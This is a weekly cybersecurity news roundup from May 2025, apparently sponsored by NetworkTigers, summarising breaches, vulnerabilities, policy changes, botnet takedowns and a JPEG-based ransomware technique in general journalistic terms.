San Mateo, CA, May 19, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.
White House withdraws plan to regulate data brokers
The CFPB has withdrawn a proposed rule that would have required data brokers to follow the same privacy standards as credit bureaus under the Fair Credit Reporting Act. Introduced in late 2024, the rule aimed to restrict the sale of sensitive personal information, including Social Security numbers, without consent. Acting CFPB Director Russell Vought, also head of the White House Office of Management and Budget, said the rule no longer aligns with the agency’s legal interpretation. The reversal follows lobbying by the Financial Technology Association, which warned the policy could disrupt fraud detection efforts. Critics argue that the decision benefits data brokers at the expense of consumer privacy, especially after several 2024 breaches that exposed millions of records. Read more.
Linux vulnerabilities exploded in 2024
Action1’s 2025 Software Vulnerability Ratings Report reveals a 967 percent spike in Linux vulnerabilities last year, totaling 3,329. macOS also saw a 95 percent jump to 508 flaws, contributing to an overall 61 percent increase in vulnerabilities disclosed across platforms. Exploited flaws rose from 101 in 2023 to 198 in 2024, led by Google Chrome with a 1,840 percent increase and Microsoft Office with a 433 percent jump. Critical vulnerabilities grew by 37 percent, driven by a 71 percent rise in Linux and a 606 percent increase in MSSQL. While remote code execution vulnerabilities declined for Linux and macOS, the report suggests attackers are shifting tactics, not slowing down. Read more.
CISA alerts on five active Windows zero-days
CISA has confirmed that five zero-day vulnerabilities in Microsoft Windows are under active exploitation, affecting core components such as the CLFS driver, WinSock, Windows Scripting Engine, and the Desktop Window Manager. These flaws, patched in Microsoft’s May 2025 update, could allow attackers to execute remote code or escalate privileges to gain complete control of a system. There is no direct evidence linking these exploits to ransomware campaigns, but experts say they present serious risks for data breaches and malware deployment. All supported versions of Windows are affected. Federal agencies are required to apply the updates by June 3, and CISA urges all organizations to patch immediately. Read more.
Coinbase breach tied to bribed support agents
Coinbase has confirmed that attackers bribed a small number of overseas support agents in India, leading to a data breach that exposed personal details of fewer than 1 percent of its nearly 10 million monthly users. Leaked information included contact data, partial Social Security numbers, government ID images, and limited banking details. The attackers used this information in phishing campaigns to impersonate Coinbase and steal crypto assets. On May 11, they attempted to extort Coinbase for $20 million but failed. Coinbase says no passwords, private keys, or Prime accounts were compromised, and it is reimbursing affected users, tightening insider controls, and offering a $20 million reward for tips leading to arrests. Read more.
Adobe patches Illustrator code execution flaw
Adobe has issued a critical security fix for Illustrator to address CVE-2025-30330, a heap-based buffer overflow vulnerability rated 7.8 on the CVSS scale. The bug affects Illustrator 2025 version 29.3 and earlier, and Illustrator 2024 version 28.7.5 and earlier, on both Windows and macOS. Exploitation requires user interaction, such as opening a malicious .ai file sent via email or downloaded from a compromised site. Attackers could gain the same system privileges as the current user. Adobe credited researcher “yjdfy” for reporting the flaw and urges all users to update through the Creative Cloud desktop app. No active exploits have been detected, but that could change at any time. Read more.
Scattered Spider targets U.S. retail sector
Google is warning that the cybercrime group Scattered Spider, also known as UNC3944 or Octo Tempest, has shifted its focus from the U.K. to U.S. retail chains. Previously, the group attacked British brands like Marks & Spencer using the DragonForce encryptor to lock down virtual machines. John Hultquist, Chief Analyst at Google’s Threat Intelligence Group, described the group as “aggressive, creative, and particularly effective at circumventing mature security programs,” often using social engineering and third-party access to gain entry. Other U.K. retailers such as Co-op and Harrods were also affected, indicating the group’s broader targeting of the retail industry. Read more.
Florida encryption backdoor bill withdrawn
A controversial Florida bill that would have required social media companies to provide a decryption mechanism for end-to-end encrypted messages when presented with a subpoena has failed to pass. The bill was advanced in the Florida Senate but withdrawn from consideration by the House. Critics, including the Electronic Frontier Foundation, condemned the measure as “dangerous and dumb,” noting that creating a secure encryption backdoor is technically impossible and would make all user data vulnerable. Security experts agree that such mechanisms would be ripe for abuse and fundamentally weaken online privacy. Read more.
Feds shut down 5socks and Anyproxy botnets
The U.S. Department of Justice has seized infrastructure linked to the Anyproxy and 5socks botnets, which had been operating for over 20 years by infecting outdated wireless routers with malware. The compromised routers were resold as proxy access points via Anyproxy.net and 5socks.net, netting the operators over $46 million. The takedown, Operation Moonlander, involved cooperation with law enforcement in the Netherlands and Thailand. Indictments were issued for three Russian nationals and one Kazakhstani, though extradition is unlikely due to a lack of treaties with their home countries. Read more.
JPEG-based ransomware avoids detection
A newly discovered cyberattack method hides ransomware in JPEG images using stegomalware techniques that evade traditional security tools. Attackers embed obfuscated PowerShell scripts in EXIF metadata or pixel data, which are triggered when the victim opens an Office file with embedded macros. This file downloads a second JPEG containing a Base64-encoded .NET assembly, which delivers the ransomware payload. Because the malware is hidden within image files and executed via trusted applications, it often bypasses detection, making this one of the most stealthy approaches seen to date. Read more.
Bluetooth 6.1 enhances privacy with randomization
Bluetooth 6.1 introduces randomized Resolvable Private Address (RPA) updates to combat passive tracking. Previously, RPAs refreshed at predictable intervals, typically every 15 minutes, which allowed third parties to monitor device behavior over time. The new standard randomizes updates between 8 and 15 minutes by default, with customizable ranges from 1 second to 1 hour. Using a NIST-approved random number generator, this enhancement makes it much harder to track Bluetooth-enabled devices in environments like retail stores and airports. Read more.
More cybersecurity news
- Last week’s news
- More cybersecurity news
- All articles sponsored by NetworkTigers
About NetworkTigers
NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.
